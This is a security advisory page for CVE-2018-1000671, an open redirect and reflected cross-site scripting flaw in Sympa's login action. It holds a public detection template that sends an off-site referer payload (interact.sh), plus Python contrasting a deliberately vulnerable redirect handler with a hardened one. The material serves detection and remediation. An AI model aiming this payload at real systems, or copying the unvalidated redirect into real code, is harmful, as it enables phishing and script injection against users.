CVE-2018-1000671: Sympa version =>6.2.16 - Cross-Site Scripting

Date: 2025-08-01 | Affected software: Sympa | PoC: public

Vulnerability description

Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs.

PoC code [public]

id: CVE-2018-1000671

info:
  name: Sympa version =>6.2.16 - Cross-Site Scripting
  author: 0x_Akoko
  severity: medium
  description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Sympa (>=6.2.17) or apply the necessary security patches provided by the vendor.
  reference:
    - https://github.com/sympa-community/sympa/issues/268
    - https://vuldb.com/?id.123670
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671
    - https://lists.debian.org/debian-lts-announce/2018/09/msg00023.html
    - https://lists.debian.org/debian-lts-announce/2020/11/msg00015.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-1000671
    cwe-id: CWE-601
    epss-score: 0.00883
    epss-percentile: 0.746
    cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sympa
    product: sympa
    shodan-query: http.html:"sympa"
    fofa-query: body="sympa"
  tags: cve,cve2018,redirect,sympa,debian

http:
  - method: GET
    path:
      - '{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email='

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4b0a00483046022100c6c342142e4002dc6871b17c2351f68fd8317aca2ca5594ef2bf574d57d320280221008c50f7269266ec8de9e6f00bc8608cb65ba3df60078d2f7dc21be7d4557a254c:922c64590222798bb761d5b6d8e72950
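The template above detects the flaw by sending an off-site value in the `referer` parameter of the login action and checking whether the server's `Location` header echoes it back. The Python below is an added example, not Sympa's own code (Sympa is written in Perl), that puts the weak redirect pattern the advisory describes next to a hardened same-origin version and re-implements the template's header matcher over constructed responses. The site origin `https://lists.example.org`, the function names, and the sample responses are assumptions made for the example.

```python
import re
from urllib.parse import urljoin, urlsplit, urlunsplit

# Constructed placeholder for the application's own origin (not a real deployment).
SITE_ORIGIN = "https://lists.example.org"


def vulnerable_redirect_target(referer: str) -> str:
    """The weak pattern the advisory describes: the user-supplied referer value
    becomes the Location header verbatim, so any scheme or host is accepted."""
    return referer


def safe_redirect_target(referer: str, site_origin: str = SITE_ORIGIN) -> str:
    """Hardened form: resolve the value against our own origin and keep it only
    if it still points at our host over http(s); otherwise fall back to '/'."""
    site = urlsplit(site_origin)
    fallback = urlunsplit((site.scheme, site.netloc, "/", "", ""))
    referer = (referer or "").strip()
    if not referer:
        return fallback
    # CR/LF inside the value would let the caller inject further response headers.
    if "\r" in referer or "\n" in referer:
        return fallback
    # Browsers treat '/\' and '\' like '//' (scheme-relative); urljoin does not.
    if referer.startswith(("//", "/\\", "\\")):
        return fallback
    target = urlsplit(urljoin(site_origin, referer))
    # data:, javascript: and other schemes survive urljoin unchanged; reject them.
    if target.scheme.lower() not in ("http", "https"):
        return fallback
    # Exact netloc comparison also defeats 'ourhost@evil' and 'ourhost.evil' forms.
    if target.netloc.lower() != site.netloc.lower():
        return fallback
    # Re-emit on our own scheme so a downgraded http:// value cannot slip through.
    return urlunsplit((site.scheme, site.netloc, target.path or "/", target.query, ""))


def login_response(referer: str, hardened: bool) -> str:
    """Constructed minimal 302 response for the post-login redirect."""
    target = safe_redirect_target(referer) if hardened else vulnerable_redirect_target(referer)
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\nContent-Length: 0\r\n\r\n"


def location_redirects_to(raw_headers: str, oob_host: str = "interact.sh") -> bool:
    """Mirror of the template's header matcher: True when a Location header sends
    the browser to oob_host in absolute, scheme-relative or backslash form."""
    pattern = (
        r"(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)"
        r"(?:[a-zA-Z0-9\-_\.@]*)" + re.escape(oob_host) + r"\/?(\/|[^.].*)?$"
    )
    return re.search(pattern, raw_headers.replace("\r\n", "\n")) is not None


if __name__ == "__main__":
    probe = "http://interact.sh"  # the value the template places in the referer parameter
    for hardened in (False, True):
        resp = login_response(probe, hardened)
        verdict = "redirects off-site" if location_redirects_to(resp) else "stays on-site"
        print("hardened" if hardened else "vulnerable", "->", verdict)
```

Running the block shows the vulnerable handler tripping the matcher and the hardened handler not doing so. The hardened version deliberately rebuilds the redirect URL from the site's own scheme and host rather than trying to sanitize the input string, which is why scheme-relative, userinfo and `data:` forms all collapse to the fallback instead of needing individual rules.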